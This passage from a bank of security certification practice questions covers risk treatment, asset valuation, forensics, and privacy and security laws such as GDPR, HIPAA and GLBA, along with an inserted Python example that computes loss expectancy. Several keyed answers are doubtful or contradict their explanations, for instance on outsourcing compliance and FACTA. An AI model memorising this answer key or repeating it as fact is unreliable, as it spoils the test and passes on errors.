Which of the following activities is NOT involved in regular risk monitoring and review? A. Tracking risk treatment progress B. Reviewing risk assessments C. Analyzing incident reports D. Implementing risk treatment plans
Answer: D. Implementing risk treatment plans Explanation: Regular risk monitoring and review involves tracking risk treatment progress, reviewing risk assessments, and analyzing incident reports. Implementing risk treatment plans is part of risk treatment, not monitoring and review.
318
In the context of compliance and regulatory considerations, what does it mean to “conduct compliance audits”? A. Determine which laws and regulations apply to the organization B. Establish policies and procedures that address legal and regulatory requirements C. Perform regular assessments of the organization’s adherence to relevant laws and regulations D. Develop and maintain incident response plans
Answer: C. Perform regular assessments of the organization’s adherence to relevant laws and regulations Explanation: Conducting compliance audits involves performing regular assessments to check whether the organization is adhering to relevant laws and regulations. This process helps to identify any deviations or noncompliance issues, which can then be addressed to avoid legal penalties, reputational damage, and other negative consequences. Options A, B, and D are all important components of a compliance program but do not define the term “conduct compliance audits.”
319
Which one of the following is not a risk treatment option? A. Risk acceptance B. Risk avoidance C. Risk mitigation D. Risk expansion
Answer: D. Risk expansion Explanation: Risk expansion is not a recognized risk treatment option. The commonly accepted risk treatment options are risk acceptance, risk avoidance, risk mitigation, and risk transfer.
320
What does FAIR in the risk management framework stand for? A. Factual Analysis of Intrinsic Risk B. Factor Analysis of Information Risk C. Formal Assessment of Incident Response D. Functional Analysis of Infrastructure Resilience
Answer: B. Factor Analysis of Information Risk Explanation: FAIR stands for Factor Analysis of Information Risk. It offers a quantitative approach to risk management, enabling organizations to measure and prioritize risks using financial terms.
321
What does the risk treatment option “risk transfer” involve? A. Eliminating the risk by discontinuing the activity that causes it B. Acknowledging the risk and deciding to tolerate it C. Implementing controls to reduce the risk D. Transferring the risk to a third party
Answer: D. Transferring the risk to a third party Explanation: Risk transfer involves shifting the risk to a third party, such as an insurance company or a service provider.
322
Which of the following is not a type of control used in risk mitigation strategies? A. Technical controls B. Administrative controls C. Physical controls D. Emotional controls
Answer: D. Emotional controls Explanation: Risk mitigation strategies involve technical, administrative, and physical controls. Emotional controls are not a recognized type of control in risk mitigation.
323
Which of the following is not a part of the risk assessment process? A. Identify assets B. Identify threats C. Identify vulnerabilities D. Assess operational efficiency
Answer: D. Assess operational efficiency Explanation: The risk assessment process involves identifying assets, threats, and vulnerabilities, assessing the potential impact and likelihood of each threat-vulnerability pair, and prioritizing risks. Assessing operational efficiency is not part of this process.
324
What is the primary purpose of business continuity and disaster recovery planning? A. To prevent disasters from occurring B. To prepare for, respond to, and recover from disruptions or disasters C. To eliminate all risks associated with the organization D. To ensure all staff are trained in emergency procedures
Answer: B. To prepare for, respond to, and recover from disruptions or disasters Explanation: The primary purpose of business continuity and disaster recovery planning is to prepare for, respond to, and recover from disruptions or disasters. While prevention is ideal, it is not always possible, hence the need for preparation, response, and recovery plans.
325
Which asset valuation methodology considers the asset’s contribution to the organization’s intellectual property, customer trust, or competitive advantage? A. Financial value B. Business impact C. Market value D. Intangible value
Answer: D. Intangible value Explanation: Intangible value considers the asset’s contribution to the organization’s intellectual property, customer trust, or competitive advantage. These aspects may not have a direct monetary value but are critical to the organization’s success.
326
What does the “canons” in the ISC2 Code of Ethics refer to? A. A list of security technologies B. A set of fundamental principles C. A set of regulatory laws D. A list of cybersecurity certifications
Answer: B. A set of fundamental principles Explanation: The “canons” in the ISC2 Code of Ethics refer to a set of fundamental principles that guide the ethical and professional behavior of information security professionals.
327
What is the primary difference between risk acceptance and risk avoidance? A. Risk acceptance eliminates the risk, while risk avoidance tolerates the risk. B. Risk acceptance tolerates the risk, while risk avoidance eliminates the risk. C. Risk acceptance transfers the risk, while risk avoidance mitigates the risk D. Risk acceptance mitigates the risk, while risk avoidance transfers the risk.
Answer: B. Risk acceptance tolerates the risk, while risk avoidance eliminates the risk. Explanation: Risk acceptance involves acknowledging and deciding to tolerate the risk, whereas risk avoidance involves eliminating the risk by discontinuing the activity or process that causes it.
328
Which of the following is not typically included in a comprehensive enterprise risk management program according to the COSO ERM framework? A. Risk governance and culture B. Risk strategy and objective setting C. Risk in execution and performance D. Risk in product design and marketing
Answer: D. Risk in product design and marketing Explanation: The COSO ERM framework includes principles and guidance focusing on risk governance and culture, strategy and objective setting, and risk in execution and performance. Risk in product design and marketing, while important, is not specifically mentioned in the framework.
329
In the context of risk management, what is the primary role of a quantitative risk assessment? A. To make subjective judgments about risks B. To rank risks based on expert opinion C. To use numerical values to estimate risks D. To categorize risks as low, medium, or high
Answer: C. To use numerical values to estimate risks Explanation: Quantitative risk assessment uses numerical values and calculations to estimate potential risks, often in terms of potential financial impact.
330
Which of the following is not a primary component of risk, as defined in risk management? A. Threats B. Vulnerabilities C. Impacts D. Controls
Answer: D. Controls Explanation: Controls are not a component of risk but are measures taken to mitigate risk. The primary components of risk are threats, vulnerabilities, and potential impacts.
331
What does the NIST SP 800-37 framework primarily provide guidelines for? A. Implementing an information security risk management process B. Implementing a risk management process for federal information systems C. Providing a quantitative approach to risk management D. Developing a comprehensive enterprise risk management program
Answer: B. Implementing a risk management process for federal information systems Explanation: NIST SP 800-37 describes the Risk Management Framework (RMF), which provides guidelines for implementing a risk management process for federal information systems, from categorizing the system through selecting, implementing, assessing, and authorizing controls and monitoring them over time.
332
What is one key element of effective risk communication and reporting? A. Using complex technical terms to explain risks B. Communicating risks as infrequently as possible C. Presenting information in a clear and understandable D. Presenting information in a clear and understandable manner
Answer: D. Presenting information in a clear and understandable manner Explanation: Effective risk communication and reporting involve presenting risk-related information clearly, concisely, and in a timely manner. This allows stakeholders at all levels, regardless of their technical expertise, to comprehend the risks and make informed decisions. Option A is incorrect because complex technical terms can make the information harder to understand, especially for nontechnical stakeholders. Option B is also incorrect because frequent communication of risk-related information is crucial to keep all stakeholders informed and aware of the current risk landscape.
333
In the context of risk management, why is it important to integrate risk management into an organization’s business processes? A. It helps to increase the number of risks the organization faces. B. It allows risk considerations to be part of decision-making processes and overall business strategy. C. It ensures that risks are only handled by the risk management department. D. It reduces the need for regular risk monitoring and review.
Answer: B. It allows risk considerations to be part of decision-making processes and overall business strategy. Explanation: Integrating risk management into an organization’s business processes ensures that risk considerations are incorporated into all aspects of the business, including decision-making processes, resource allocation, and strategic planning. This approach promotes a risk-aware culture and allows the organization to manage risks proactively rather than responding to them reactively.
334
Which of the following best describes risk acceptance? A. The organization reduces the risk by implementing controls. B. The organization acknowledges the risk and decides to tolerate it. C. The organization transfers the risk to a third party. D. The organization eliminates the risk source.
Answer: B. The organization acknowledges the risk and decides to tolerate it. Explanation: Risk acceptance involves acknowledging risk and deciding to tolerate it without implementing additional controls. This typically occurs when the cost of mitigating the risk exceeds the potential benefit or when the risk is deemed to have a low impact on the organization.
335
What is the primary purpose of asset valuation in the context of risk management? A. To estimate the direct monetary value of an asset B. To identify potential threats to the asset C. To assess the potential impact and likelihood of threats to the asset D. To prioritize the asset for risk treatment
Answer: A. To estimate the direct monetary value of an asset Explanation: Asset valuation involves assigning a value to an organization’s assets, such as hardware, software, data, or personnel. This value can be based on various factors, including the cost of purchasing, maintaining, or replacing the asset; its potential impact on the organization’s operations or reputation; its market value; or its intangible value.
336
Which of the following is a key component of effective risk communication and reporting? A. Using complex technical terms and jargon B. Communicating risks and risk management activities irregularly C. Tailoring the content and format of risk reports to the needs of the intended audience D. Keeping risk communication and reporting inconsistent across the organization
Answer: C. Tailoring the content and format of risk reports to the needs of the intended audience Explanation: Effective risk communication and reporting should be tailored to the needs and preferences of the intended audience. This includes presenting information in a clear, concise, and understandable manner; communicating risks and risk management activities regularly; and maintaining consistency in risk communication and reporting across the organization
337
What is the main goal of business continuity and disaster recovery planning? A. To eliminate all risks faced by the organization B. To ensure that the organization can continue operating during and after a disruption or disaster C. To prioritize risks for treatment D. To transfer the financial risk of a disruption or disaster to a third party
Answer: B. To ensure that the organization can continue operating during and after a disruption or disaster Explanation: Business continuity and disaster recovery planning aim to ensure that an organization can continue its critical operations during and after a disruption or disaster. This involves identifying critical business functions, assessing potential disruptions, developing recovery strategies, implementing recovery plans, and regularly testing and maintaining these plans.
338
According to the ISC2 Code of Ethics, which of the following is a primary ethical obligation of a security professional? A. To advance one’s own professional interests B. To provide diligent and competent service to principals C. To avoid service to the community D. To use their skills primarily for personal gain
Answer: B. To provide diligent and competent service to principals Explanation: According to the ISC2 Code of Ethics, a primary ethical obligation of a security professional is to provide diligent and competent service to principals. This means that security professionals should strive to serve their employers, clients, and other stakeholders with the highest level of professionalism.
339
Which of the following is not a type of control mentioned in the risk mitigation strategies? A. Technical B. Administrative C. Physical D. Spiritual
Answer: D. Spiritual
340
Which of the following is a key component of the risk monitoring and review process? A. Ignoring risk treatment progress B. Avoiding reviewing risk assessments C. Tracking risk treatment progress D. Omitting incident report analysis
Answer: C. Tracking risk treatment progress Explanation: Tracking risk treatment progress is a key component of the risk monitoring and review process. Other elements include reviewing risk assessments, analyzing incident reports, and evaluating the overall effectiveness of the risk management program.
341
How does integrating risk management into an organization’s business processes benefit the organization? A. It decreases the organization’s profitability. B. It ensures that risk considerations are part of decision-making processes. C. It eliminates all the risks faced by the organization. D. It restricts stakeholder involvement.
Answer: B. It ensures that risk considerations are part of decision-making processes. Explanation: Integrating risk management into an organization’s business processes helps ensure that risk considerations are part of decision-making processes, resource allocation, and overall business strategy. This can help the organization make better informed decisions and mitigate potential risks more effectively.
342
Which of the following activities is not a part of compliance and regulatory considerations? A. Identifying applicable laws and regulations B. Developing policies and procedures C. Ignoring compliance audits D. Implementing incident response plans
Answer: C. Ignoring compliance audits Explanation: Ignoring compliance audits is not a part of compliance and regulatory considerations. Regular audits are important for assessing the organization’s compliance with relevant laws and regulations and identifying potential gaps or areas for improvement.
343
Which of the following risk treatment options involves transferring the risk to a third party? A. Risk acceptance B. Risk avoidance C. Risk mitigation D. Risk transfer
Answer: D. Risk transfer Explanation: Risk transfer is a risk treatment option that involves transferring the risk to a third party, such as an insurance company or a service provider.
344
What does the intangible value of an asset refer to in the context of asset valuation methodologies? A. The asset’s direct monetary value B. The asset’s market demand C. The asset’s contribution to the organization’s intellectual property or customer trust D. The asset’s impact on the organization’s operations
Answer: C. The asset’s contribution to the organization’s intellectual property or customer trust Explanation: The intangible value of an asset refers to nonmonetary aspects such as its contribution to the organization’s intellectual property, customer trust, or competitive advantage.
345
What is the most effective method to ascertain the value of an intangible asset? A. Calculate the physical storage costs and multiply by the company’s projected lifespan B. Engage a financial or accounting expert to determine the asset’s profit returns C. Examine the intangible asset’s depreciation over the previous three years D. Refer to the historical cost of acquiring or developing the intangible asset
Answer: B. Engage a financial or accounting expert to determine the asset’s profit returns Explanation: The value of an intangible asset is best determined by assessing its economic benefits, such as the profits it generates. A financial or accounting professional is best equipped to calculate this.
346
What is the key characteristic of qualitative risk assessment? A. It can be executed easily and by individuals with basic knowledge of the risk assessment process. B. It can be executed by individuals with basic knowledge of risk assessment and utilizes specific metrics for risk calculation. C. It uses specific metrics for risk calculation and can be easily implemented. D. It can be done by individuals with limited risk assessment knowledge and utilizes specific metrics for risk calculation.
Answer: A. It can be executed easily and by individuals with basic knowledge of the risk assessment process. Explanation: Qualitative risk assessment is characterized by its simplicity and the ability to be performed by individuals with a basic understanding of the process. It does not rely heavily on specific metrics or calculations; rather, it uses descriptions or categories to assess and prioritize risks.
347
How is Single Loss Expectancy (SLE) computed? A. By multiplying the asset value and the Annualized Rate of Occurrence (ARO) B. By using asset value, Local Annual Frequency Estimate (LAFE), and Standard Annual Frequency Estimate (SAFE) C. By multiplying the asset value and exposure factor D. By using the Local Annual Frequency Estimate and the Annualized Rate of Occurrence
Answer: C. By multiplying the asset value and exposure factor Explanation: Single Loss Expectancy (SLE) is calculated by multiplying the asset value (how much the asset is worth) by the exposure factor (the proportion of the asset value that is lost in a single occurrence of the incident, expressed as a value between 0 and 1).
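The SLE computation above carried through to a treatment decision, as an added example that is not part of the original deck; it also illustrates the quantitative assessment of question 329 and the impact-based risk decision of question 296. Beyond the SLE formula on the card it uses two further standard quantitative formulas the card does not state: ALE = SLE x ARO, and safeguard value = ALE before the control minus ALE after it minus the control's annual cost. Every asset value, exposure factor, rate and cost is constructed.

```python
"""Quantitative risk figures and a cost-justified treatment choice.

Added example, not from the original flashcard deck. All asset values, exposure
factors, annualized rates of occurrence and costs are constructed.
"""
from dataclasses import dataclass
from typing import List


def sle(asset_value: float, exposure_factor: float) -> float:
    """Single Loss Expectancy: loss from one occurrence. EF is the fraction of the
    asset value lost, so it must lie in [0, 1]."""
    if not 0.0 <= exposure_factor <= 1.0:
        raise ValueError("exposure factor must be between 0 and 1")
    return asset_value * exposure_factor


def ale(single_loss: float, aro: float) -> float:
    """Annualized Loss Expectancy: expected loss per year. ARO may exceed 1
    (several occurrences a year) or be far below 1 (once in many years)."""
    if aro < 0.0:
        raise ValueError("annualized rate of occurrence cannot be negative")
    return single_loss * aro


def safeguard_value(ale_before: float, ale_after: float, annual_cost: float) -> float:
    """Net annual benefit of a control; positive means it pays for itself."""
    return ale_before - ale_after - annual_cost


@dataclass(frozen=True)
class Treatment:
    name: str
    kind: str            # accept / mitigate / transfer / avoid
    annual_cost: float   # what the option costs per year
    residual_ale: float  # expected annual loss that remains

    @property
    def total_annual_cost(self) -> float:
        return self.annual_cost + self.residual_ale


def cheapest(options: List[Treatment]) -> Treatment:
    """Pick the option with the lowest expected annual cost (spend plus residual loss)."""
    return min(options, key=lambda t: t.total_annual_cost)


# Constructed scenario: ransomware against an order-processing system.
ASSET_VALUE = 500_000.0
EF_NOW, ARO_NOW = 0.4, 0.5
SLE_NOW = sle(ASSET_VALUE, EF_NOW)   # 200,000 per incident
ALE_NOW = ale(SLE_NOW, ARO_NOW)      # 100,000 per year


def treatments() -> List[Treatment]:
    # mitigate: offline backups plus EDR, 30,000/yr; EF drops to 0.1, ARO to 0.25
    ale_mitigated = ale(sle(ASSET_VALUE, 0.1), 0.25)   # 12,500
    # transfer: cyber insurance premium 40,000/yr reimbursing 90% of any loss
    ale_insured = ALE_NOW * (1.0 - 0.9)                # 10,000
    # mitigate, expensively: full platform rebuild 120,000/yr; EF 0.1, ARO 0.1
    ale_rebuilt = ale(sle(ASSET_VALUE, 0.1), 0.1)      # 5,000
    return [
        Treatment("accept", "accept", 0.0, ALE_NOW),
        Treatment("backups + EDR", "mitigate", 30_000.0, ale_mitigated),
        Treatment("cyber insurance", "transfer", 40_000.0, ale_insured),
        Treatment("full rebuild", "mitigate", 120_000.0, ale_rebuilt),
    ]


if __name__ == "__main__":
    print(f"SLE {SLE_NOW:,.0f}  ALE {ALE_NOW:,.0f}")
    for t in sorted(treatments(), key=lambda t: t.total_annual_cost):
        print(f"{t.name:16s} {t.kind:9s} total {t.total_annual_cost:,.0f}/yr")
    print("recommended:", cheapest(treatments()).name)
```

The control with the lowest residual loss (the full rebuild) is the worst choice once its own cost is included, and accepting the risk is not free either: its "cost" is the expected loss it leaves on the table. That is what "risk decisions based on business impact" means in numbers.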
348
What are the factors to consider when deciding on the type of risk assessment to perform? A. Organizational culture, probability of exposure, and budget B. Budget, resource capabilities, and probability of exposure C. Resource capabilities, probability of exposure, and budget D. Organizational culture, budget, and resource capabilities
Answer: D. Organizational culture, budget, and resource capabilities Explanation: The type of risk assessment to be performed in an organization is influenced by various factors. These include the organizational culture (which can determine the acceptance and understanding of the assessment process), the available budget (which can limit or extend the scope and depth of the assessment), and resource capabilities (which can impact the ability to perform certain types of assessments). While the probability of exposure is a factor in risk assessment, it is part of the assessment process itself rather than a determining factor in the type of risk assessment to be conducted.
349
What does security awareness training encompass? A. Legal security compliance objectives B. Security roles and responsibilities of staff C. High-level results of vulnerability assessments D. Specialized curriculum tasks, coursework, and an accredited institution
Answer: B. Security roles and responsibilities of staff Explanation: Security awareness training typically covers the roles and responsibilities of staff regarding security. It aims to equip them with the knowledge they need to recognize and respond appropriately to security threats.
350
What is the purpose of a signed user acknowledgment of the corporate security policy? A. To ensure that users have read the policy B. To ensure that users understand the policy, as well as the consequences of not adhering to the policy C. Can be waived if the organization is satisfied that users have a good understanding of the policy D. To protect the organization if a user’s behavior violates the policy
Answer: D. To protect the organization if a user’s behavior violates the policy Explanation: While all options may have some relevance, a signed user acknowledgment of the corporate security policy primarily helps protect the organization if a user’s behavior violates the policy. It serves as documented evidence that the user was aware of the policy and the associated consequences of noncompliance.
351
What does effective security management accomplish? A. Achieves security at the lowest cost B. Reduces risk to an acceptable level C. Prioritizes security for new products D. Implements patches in a timely manner
Answer: B. Reduces risk to an acceptable level Explanation: Effective security management focuses on mitigating risk to a level that is acceptable to the organization, balancing the cost of risk mitigation with the potential impact of security incidents. While cost control, prioritization for new products, and timely patching are important, they are part of a broader strategy aimed at risk reduction.
352
What threats does the principle of availability protect information from? A. Denial-of-service attacks, fires, floods, hurricanes, and unauthorized transactions B. Fires, floods, hurricanes, unauthorized transactions, and unreadable backup tapes C. Unauthorized transactions, fires, floods, hurricanes, and unreadable backup tapes D. Denial-of-service attacks, fires, floods, hurricanes, and unreadable backup tapes
Answer: D. Denial-of-service attacks, fires, floods, hurricanes, and unreadable backup tapes Explanation: The principle of availability in information security is concerned with ensuring that authorized users have access to data and resources when needed. This involves protection against a variety of threats including denial-of-service attacks; natural disasters like fires, floods, and hurricanes; and technical issues such as unreadable backup tapes.
353
To maintain impartiality, the security officer could report to which of the following? A. CEO, application development, or CFO B. Chief Information Officer, CFO, or application development C. CFO, CEO, or Chief Information Officer D. Application development, CFO, or CEO
Answer: C. CFO, CEO, or Chief Information Officer Explanation: To avoid bias and ensure independence, a security officer could report directly to top-level management such as the Chief Financial Officer (CFO), Chief Executive Officer (CEO), or the Chief Information Officer (CIO). This arrangement helps to ensure that security concerns are addressed at the highest level of decision-making.
354
What is the best use of tactical security plans? A. To establish high-level security policies B. To enable enterprise-wide security management C. To minimize downtime D. To deploy new security technology
Answer: D. To deploy new security technology Explanation: Tactical security plans are typically used to guide the implementation of specific security measures, such as the deployment of new security technologies. These plans have a shorter time horizon than strategic security plans and are more detailed, focusing on the practical aspects of implementing security measures.
355
Who is responsible for the implementation of information security? A. Everyone B. Senior management C. Security officer D. Data owners
Answer: A. Everyone Explanation: While specific roles like the security officer, senior management, and data owners have key responsibilities, implementing information security is a shared responsibility. Everyone in an organization has a part to play in maintaining security, from following established policies to reporting potential security incidents.
356
In which phase is security likely to be the most costly? A. Design B. Rapid prototyping C. Testing D. Implementation
Answer: D. Implementation Explanation: Implementing security measures often involves significant costs, including the purchase of security hardware or software, hiring or training staff, and potential disruptions to business operations. It’s generally more cost-effective to consider security early in the design phase, where potential issues can be addressed before they become expensive problems during implementation.
357
What attributes should a security policy have to remain relevant and meaningful over time? A. Directive words such as shall, must, or will, technical specifications, and should be short in length B. A defined policy development process, should be short in length, and contain directive words such as shall, must, or will C. Short in length, contain technical specifications, and directive words such as shall, must, or will D. Directive words such as shall, must, or will, a defined policy development process, and is short in length
Answer: D. Directive words such as shall, must, or will, a defined policy development process, and is short in length Explanation: A security policy that remains meaningful over time is one that is clear and concise, has a defined policy development and review process, and uses directive words to clearly communicate the requirements. It doesn’t necessarily need to contain detailed technical specifications, as these may change over time and could make the policy less adaptable and more difficult to maintain.
358
Which among the following best describes an intangible asset’s valuation process? A. Multiplying the physical storage costs by the company’s expected lifespan B. Collaborating with finance or accounting professionals to ascertain the profit returned by the asset C. Reviewing the intangible asset’s depreciation over the past three years D. Using the historical acquisition or development cost of the intangible asset
Answer: B. Collaborating with finance or accounting professionals to ascertain the profit returned by the asset Explanation: The value of an intangible asset is often best determined by its ability to generate profit. Therefore, working with finance or accounting professionals to ascertain the profit returned by the asset is typically the most effective approach.
359
Which principle is violated if one individual in the finance department has the ability to add vendors to the vendor database and subsequently make payments to the vendor? A. A well-formed transaction B. Separation of duties C. Least privilege D. Data sensitivity level
Answer: B. Separation of duties Explanation: The separation of duties principle is designed to prevent errors and fraud that might be possible when only one person is in control of all parts of a process. Here, allowing one person to both add vendors and make payments could lead to fraudulent transactions. Hence, this scenario is a violation of the separation of duties principle.
360
What is the best way to mitigate collusion? A. Job rotation B. Data classification C. Defining job sensitivity level D. Least privilege
Answer: A. Job rotation Explanation: Collusion is the act of collaborating fraudulently within an organization to deceive or defraud. Job rotation, which involves moving employees between different roles, is a good way to prevent collusion because it reduces the opportunity for long-term manipulation in any single position.
361
Who is best suited to make decisions about data access? A. User managers B. Data owners C. Senior management D. Application developers
Answer: B. Data owners Explanation: Data owners, the individuals or entities responsible for the data’s security and use, are best suited to make decisions about data access. They understand the data’s sensitivity and the potential risks of unauthorized access. While other stakeholders may have input, the ultimate decision should lie with the data owner.
362
What is the most significant source of cybercrime risk? A. Outsiders B. Nation-states C. Insiders D. Script kiddies
Answer: C. Insiders Explanation: Although cybercrime can come from various sources, the greatest risk often comes from insiders. These are individuals who have legitimate access to the system and can misuse it for harmful activities. Insider threats are difficult to detect and can cause substantial damage.
363
What is the primary obstacle in combating computer crime? A. Computer criminals are generally smarter than computer investigators. B. Adequate funding to stay ahead of the computer criminals. C. Activity associated with computer crime is truly international. D. There are so many more computer criminals than investigators that it is impossible to keep up.
Answer: C. Activity associated with computer crime is truly international. Explanation: The international nature of computer crime is a major hindrance to fighting it. Jurisdictional issues, differences in laws across countries, and the sheer scope of the Internet make it challenging to investigate and prosecute cybercrimes effectively.
364
What discipline does computer forensics combine with computer science, information technology, and engineering? A. Law B. Information systems C. Analytical thought D. The scientific method
Answer: A. Law Explanation: Computer forensics is a multidisciplinary field that combines computer science, information technology, and engineering with law. The goal is to gather and analyze data in a way that is legally admissible.
365
Which principle allows an investigator to identify aspects of a person responsible for a crime, based on the residual traces left behind while stealing information? A. Meyer’s principle of legal impunity B. Criminalistic principles C. IOCE/Group of 8 Nations principles for computer forensics D. Locard’s principle of exchange
Answer: D. Locard’s principle of exchange Explanation: Locard’s exchange principle states that the perpetrator of a crime will bring something into the crime scene and leave with something from it, and that both can be used as forensic evidence. This principle is applicable to cybercrimes, where digital traces can be left behind.
366
Which of the following is a part of the fundamental principles of evidence? A. Authenticity, redundancy, and admissibility B. Completeness, authenticity, and admissibility C. Completeness, redundancy, and authenticity D. Redundancy, admissibility, and completeness
Answer: B. Completeness, authenticity, and admissibility Explanation: The five cardinal rules of evidence include completeness, authenticity, admissibility, accuracy, and reasonableness. Hence, option B is correct as it contains three of these principles.
367
Which of the following is not listed as a stage in incident response? A. Documentation B. Prosecution C. Containment D. Investigation
Answer: B. Prosecution Explanation: While prosecution may be a result of an incident response, it is not a phase in itself. The typical phases of incident response include preparation, identification, containment, eradication, recovery, and lessons learned/documentation.
368
Which type of law primarily focuses on the abstract concepts and is greatly influenced by the writings of legal scholars and academics? A. Criminal law B. Civil law C. Religious law D. Administrative law
Answer: B. Civil law Explanation: Civil law, also known as Roman law, is primarily based on written codes, statutes, and legal principles developed by legal scholars and academics. It emphasizes abstract concepts of law.
369
Which category of intellectual property protection covers the expression of ideas rather than the ideas themselves? A. Trademark B. Patent C. Copyright D. Trade secret
Answer: C. Copyright Explanation: Copyright law protects the expression of an idea in a tangible medium, such as a book, song, or software program, rather than the idea itself.
370
Which type of intellectual property safeguards the goodwill that a merchant or vendor invests in its products? A. Trademark B. Patent C. Copyright D. Trade secret
Answer: A. Trademark Explanation: Trademarks protect brand names, logos, and other identifiers that signify the source of goods or services. The value of a trademark lies in the goodwill and brand recognition that a merchant or vendor builds in its products or services.
371
Which of the following represent types of software licensing? A. Freeware, open source, and commercial B. Commercial, academic, and open source C. Academic, freeware, and open source D. Freeware, commercial, and academic
Answer: D. Freeware, commercial, and academic Explanation: These are all types of software licensing. Freeware is software that is available free of charge. Commercial software is typically sold for profit. Academic licenses are special types of software licenses designed for educational institutions. These licenses are often offered at a discounted rate and may come with specific terms and conditions that restrict usage to educational purposes only.
372
What is most directly concerned with the rights and duties of individuals and organizations in relation to the gathering, usage, storage, and sharing of personal data? A. Privacy B. Secrecy C. Availability D. Reliability
Answer: A. Privacy Explanation: Privacy deals with the rights and obligations of individuals and organizations with respect to the collection, use, retention, and disclosure of personal information.
373
Which of the following subphases are included in the triage process of incident response? A. Collection, transport, testimony B. Traceback, feedback, loopback C. Detection, identification, notification D. Confidentiality, integrity, availability
Answer: C. Detection, identification, notification Explanation: The initial steps of triage in incident response typically include detection (discovering the incident), identification (understanding the nature of the incident), and notification (informing relevant parties about the incident).
374
The integrity of a forensic bit stream image is verified by A. Comparing hash totals to the original source B. Keeping good notes C. Taking pictures D. Encrypted keys
Answer: A. Comparing hash totals to the original source Explanation: The integrity of a forensic bit stream image is typically verified by comparing the hash of the image to the hash of the original source. If the hashes match, it verifies that the image is an exact replica of the original.
375
In the context of digital evidence, the crime scene should A. Remain unaltered at all times B. Be fully replicable in a legal setting C. Be located in a single country D. Have the minimum possible level of contamination
Answer: D. Have the minimum possible level of contamination Explanation: The aim should always be to minimize contamination of the crime scene to maintain the integrity of the digital evidence. This aids in its admissibility and reliability in a court of law.
376
In the context of outsourcing IT systems A. All regulatory and compliance requirements must be transferred to the provider. B. The outsourcing organization is relieved from compliance obligations. C. The outsourced IT systems are exempt from compliance obligations. D. The provider is exempt from compliance obligations.
Answer: A. All regulatory and compliance requirements must be transferred to the provider. Explanation: The responsibility for regulatory and compliance requirements lies with the organization, but when outsourcing IT systems, these requirements should be clearly communicated and agreed upon with the provider.
377
How does the ISC2 Code of Ethics address conflicts between canons? A. There can never be conflicts between canons. B. Through a process of adjudication. C. Based on the order of the canons. D. By having all canon conflicts reviewed by the board of directors.
Answer: C. Based on the order of the canons. Explanation: If a conflict arises between the canons in the ISC2 Code of Ethics, it is resolved by giving precedence to the canon that appears earlier in the list.
378
Which law in the United States requires federal agencies to develop, document, and implement an agency-wide program to provide security for the information systems that support its operations and assets? A. Health Insurance Portability and Accountability Act (HIPAA) B. Gramm-Leach-Bliley Act (GLBA) C. Federal Information Security Management Act (FISMA) D. Sarbanes-Oxley Act (SOX)
Answer: C. Federal Information Security Management Act (FISMA) Explanation: The FISMA requires federal agencies to develop, document, and implement an agency-wide program to provide information security for the information systems that support its operations and assets.
379
The General Data Protection Regulation (GDPR) is a regulation in EU law on data protection and privacy. Which of the following principles is NOT stated in GDPR? A. Data minimization B. Consent C. Data localization D. Accountability
Answer: C. Data localization Explanation: Data localization is not a principle stated in GDPR. GDPR principles include lawfulness, fairness, transparency, purpose limitation, data minimization, accuracy, storage limitation, integrity and confidentiality, and accountability.
380
The _____________ provides guidance for the protection of electronically protected health information. A. HIPAA Security Rule B. Sarbanes-Oxley Act C. Computer Fraud and Abuse Act D. Federal Information Security Management Act
Answer: A. HIPAA Security Rule Explanation: The HIPAA Security Rule specifically focuses on the protection of electronic protected health information (ePHI).
381
Which of the following laws mandates that organizations must have adequate security measures in place to protect customer data? A. Sarbanes-Oxley Act (SOX) B. Gramm-Leach-Bliley Act (GLBA) C. Data Protection Act (DPA) D. Federal Information Security Management Act (FISMA)
Answer: B. Gramm-Leach-Bliley Act (GLBA) Explanation: The GLBA requires financial institutions to explain their information-sharing practices to their customers and to safeguard sensitive data.
382
The purpose of the _____________ is to ensure the accuracy, fairness, and privacy of the information in a consumer’s credit reports. A. Fair Credit Reporting Act (FCRA) B. General Data Protection Regulation (GDPR) C. Gramm-Leach-Bliley Act (GLBA) D. Federal Information Security Management Act (FISMA)
Answer: A. Fair Credit Reporting Act (FCRA) Explanation: FCRA is designed to ensure the accuracy, fairness, and privacy of the information in a consumer’s credit reports.
383
What is the primary purpose of the Children’s Online Privacy Protection Act (COPPA)? A. To regulate how websites collect data about children under 13 B. To regulate how websites collect data about all users C. To protect children from inappropriate content online D. To protect the privacy of adults when they use websites
Answer: A. To regulate how websites collect data about children under 13 Explanation: COPPA imposes certain requirements on operators of websites or online services directed to children under 13 years of age and on operators of other websites or online services that have actual knowledge that they are collecting personal information online from a child under 13 years of age.
384
What is the primary purpose of the Payment Card Industry Data Security Standard (PCI DSS)? A. To protect customer data during online transactions B. To ensure the privacy of customer data C. To ensure the secure disposal of customer data D. To ensure the security of credit card transactions
Answer: D. To ensure the security of credit card transactions Explanation: PCI DSS is a set of security standards designed to ensure that all companies that accept, process, store, or transmit credit card information maintain a secure environment.
385
The _____________ outlines procedures to enhance the protection of critical infrastructure from cyber threats. A. Executive Order 13636 B. HIPAA Security Rule C. Federal Information Security Management Act (FISMA) D. Computer Fraud and Abuse Act
Answer: A. Executive Order 13636 Explanation: This executive order establishes a policy to enhance the security and resilience of the nation’s critical infrastructure and to maintain a cyber environment that encourages efficiency, innovation, and economic prosperity.
386
Which law is designed to combat identity theft by requiring businesses to destroy sensitive information derived from consumer reports? A. Fair and Accurate Credit Transactions Act (FACTA) B. General Data Protection Regulation (GDPR) C. Sarbanes-Oxley Act (SOX) D. Federal Information Security Management Act (FISMA)
Answer: A. Fair and Accurate Credit Transactions Act (FACTA) Explanation: FACTA aims to help consumers protect their data from identity theft. It allows consumers to request and obtain a free credit report once every twelve months from each of the three nationwide consumer credit reporting companies.
387
Which of the following laws makes it a crime to gain unauthorized access to protected computer systems? A. Computer Fraud and Abuse Act (CFAA) B. Fair Credit Reporting Act (FCRA) C. Federal Information Security Management Act (FISMA) D. Sarbanes-Oxley Act (SOX)
Answer: A. Computer Fraud and Abuse Act (CFAA) Explanation: The CFAA makes it illegal to intentionally access a computer without authorization or to exceed authorized access and thereby obtain protected information from any protected computer.
388
Imagine you are a cybersecurity analyst for a retail company. The company has assessed that the Single Loss Expectancy (SLE) for a data breach is $500,000. The exposure factor (EF) for such an event is estimated at 0.85, and the Annualized Rate of Occurrence (ARO) is 0.60. Additionally, the residual risk is calculated to be $200,000. Based on these metrics, what would be the resulting Annualized Loss Expectancy (ALE) for a data breach? A. $255,000 B. $510,000 C. $300,000 D. $425,000
